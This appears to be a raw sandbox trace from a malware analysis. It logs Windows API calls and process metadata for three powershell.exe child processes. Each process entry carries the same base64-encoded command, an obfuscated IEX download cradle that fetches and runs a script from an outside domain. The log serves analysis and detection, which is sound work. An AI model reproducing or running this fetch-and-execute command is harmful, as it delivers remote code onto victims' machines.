	[0890.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0890.792] CoTaskMemFree (pv=0x439a70) 
	[0891.244] CoTaskMemAlloc (cb=0x104) returned 0x439a70
	[0891.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0891.244] CoTaskMemFree (pv=0x439a70) 
	[0891.244] CoTaskMemAlloc (cb=0x104) returned 0x439a70
	[0891.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0891.244] CoTaskMemFree (pv=0x439a70) 
	[0891.244] CoTaskMemAlloc (cb=0x104) returned 0x439a70
	[0891.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0891.245] CoTaskMemFree (pv=0x439a70) 
	[0898.087] CoTaskMemAlloc (cb=0x104) returned 0x439a70
	[0898.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0898.087] CoTaskMemFree (pv=0x439a70) 
	[0898.091] CoTaskMemAlloc (cb=0x104) returned 0x439a70
	[0898.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0898.091] CoTaskMemFree (pv=0x439a70) 
	[0898.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0898.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0909.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0909.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0926.493] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0926.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.494] CoTaskMemFree (pv=0x439c90) 
	[0926.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0928.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0928.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0928.997] SetErrorMode (uMode=0x1) returned 0x1
	[0928.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24dd40 | out: lpFileInformation=0x24dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0928.998] SetErrorMode (uMode=0x1) returned 0x1
	[0962.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.454] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0962.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.454] CoTaskMemFree (pv=0x439c90) 
	[0962.457] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0962.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.457] CoTaskMemFree (pv=0x439c90) 
	[0962.458] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0962.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.458] CoTaskMemFree (pv=0x439c90) 
	[0962.461] CoCreateGuid (in: pguid=0x24e108 | out: pguid=0x24e108*(Data1=0x541fd87e, Data2=0xe70a, Data3=0x4c70, Data4=([0]=0xa3, [1]=0x12, [2]=0x2d, [3]=0x30, [4]=0x13, [5]=0x5f, [6]=0x9e, [7]=0xaa))) returned 0x0
	[0962.464] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0962.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.464] CoTaskMemFree (pv=0x439c90) 
	[0962.467] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0962.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.467] CoTaskMemFree (pv=0x439c90) 
	[0962.470] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0962.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.470] CoTaskMemFree (pv=0x439c90) 
	[0962.485] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0962.649] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24ddb0 | out: lpConsoleScreenBufferInfo=0x24ddb0) returned 1
	[0962.665] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0962.666] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24ddb0 | out: lpConsoleScreenBufferInfo=0x24ddb0) returned 1
	[0962.669] GetCurrentProcess () returned 0xffffffffffffffff
	[0962.670] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ddd8 | out: TokenHandle=0x24ddd8*=0x2e0) returned 1
	[0962.672] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dcf8 | out: TokenInformation=0x0, ReturnLength=0x24dcf8) returned 0
	[0962.673] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a7300
	[0962.673] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x3a7300, TokenInformationLength=0x4, ReturnLength=0x24dcf8 | out: TokenInformation=0x3a7300, ReturnLength=0x24dcf8) returned 1
	[0962.675] DuplicateTokenEx (in: hExistingToken=0x2e0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24de58 | out: phNewToken=0x24de58*=0x1a8) returned 1
	[0962.675] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dcf8 | out: TokenInformation=0x0, ReturnLength=0x24dcf8) returned 0
	[0962.675] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a7330
	[0962.675] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x3a7330, TokenInformationLength=0x4, ReturnLength=0x24dcf8 | out: TokenInformation=0x3a7330, ReturnLength=0x24dcf8) returned 1
	[0962.676] CheckTokenMembership (in: TokenHandle=0x1a8, SidToCheck=0x2c65e38*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24de68 | out: IsMember=0x24de68) returned 1
	[0962.676] CloseHandle (hObject=0x1a8) returned 1
	[0962.689] CoTaskMemAlloc (cb=0x804) returned 0x26ff500
	[0962.689] GetConsoleTitleW (in: lpConsoleTitle=0x26ff500, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0963.007] CoTaskMemFree (pv=0x26ff500) 
	[0963.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.053] SetConsoleCtrlHandler (HandlerRoutine=0x293689c, Add=1) returned 1
	[0964.099] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0964.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.099] CoTaskMemFree (pv=0x439c90) 
	[0964.113] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4
	[0964.116] CoCreateGuid (in: pguid=0x24df50 | out: pguid=0x24df50*(Data1=0xaa96c941, Data2=0xce3f, Data3=0x4a89, Data4=([0]=0x9c, [1]=0xc7, [2]=0xb5, [3]=0x73, [4]=0x1b, [5]=0xf0, [6]=0xe1, [7]=0x60))) returned 0x0
	[0964.117] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0964.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.117] CoTaskMemFree (pv=0x439c90) 
	[0966.573] WinSqmIsOptedIn () returned 0x0
	[0966.574] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0966.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.574] CoTaskMemFree (pv=0x439c90) 
	[0966.574] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0966.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.575] CoTaskMemFree (pv=0x439c90) 
	[0967.575] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0967.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.575] CoTaskMemFree (pv=0x439c90) 
	[0967.576] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0967.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.576] CoTaskMemFree (pv=0x439c90) 
	[0967.576] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0967.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.576] CoTaskMemFree (pv=0x439c90) 
	[0968.914] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0968.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.914] CoTaskMemFree (pv=0x439c90) 
	[0968.915] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0968.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.915] CoTaskMemFree (pv=0x439c90) 
	[0968.915] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0968.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.915] CoTaskMemFree (pv=0x439c90) 
	[0968.917] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0968.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.917] CoTaskMemFree (pv=0x439c90) 
	[0970.163] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0970.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.164] CoTaskMemFree (pv=0x439c90) 
	[0970.164] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0970.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.164] CoTaskMemFree (pv=0x439c90) 
	[0970.164] CoTaskMemAlloc (cb=0x104) returned 0x439c90
	[0970.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439c90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.164] CoTaskMemFree (pv=0x439c90) 

Thread:
	id = 971
	os_tid = 0x19f8


Thread:
	id = 996
	os_tid = 0x1a84


Thread:
	id = 1460
	os_tid = 0x1dac


Thread:
	id = 1467
	os_tid = 0x1aa4


Thread:
	id = 1520
	os_tid = 0x1de4


Thread:
	id = 1628
	os_tid = 0x2224


Thread:
	id = 1648
	os_tid = 0x2284

	[0829.801] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0892.882] RegCloseKey (hKey=0x2d0) returned 0x0
	[0892.883] RegCloseKey (hKey=0x2d8) returned 0x0
	[0892.883] RegCloseKey (hKey=0x2d4) returned 0x0

Thread:
	id = 1660
	os_tid = 0x22b4


Thread:
	id = 2064
	os_tid = 0x1ce8


Process:
	id = "176"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x53533000"
	os_pid = "0x19a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 955
	os_tid = 0x19a8

	[0550.841] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1072
	os_tid = 0x11a8


Thread:
	id = 1091
	os_tid = 0x18a0


Thread:
	id = 1578
	os_tid = 0x211c


Thread:
	id = 1596
	os_tid = 0x216c


Thread:
	id = 1612
	os_tid = 0x21dc


Thread:
	id = 1712
	os_tid = 0x11fc


Process:
	id = "177"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x17940000"
	os_pid = "0x1a28"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 981
	os_tid = 0x1a2c

	[0552.729] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1082
	os_tid = 0x18b8


Thread:
	id = 1105
	os_tid = 0x15f4


Thread:
	id = 1489
	os_tid = 0x12d4


Thread:
	id = 1494
	os_tid = 0x1ff8


Thread:
	id = 1609
	os_tid = 0x21c4


Thread:
	id = 1711
	os_tid = 0x2030


Process:
	id = "178"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5264e000"
	os_pid = "0x1a74"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 993
	os_tid = 0x1a78

	[0554.826] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.962] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0838.798] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.798] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.798] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0838.798] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0944.166] GetVersionExW (in: lpVersionInformation=0x1adac0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adac0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.168] GetVersionExW (in: lpVersionInformation=0x1adac0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adac0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
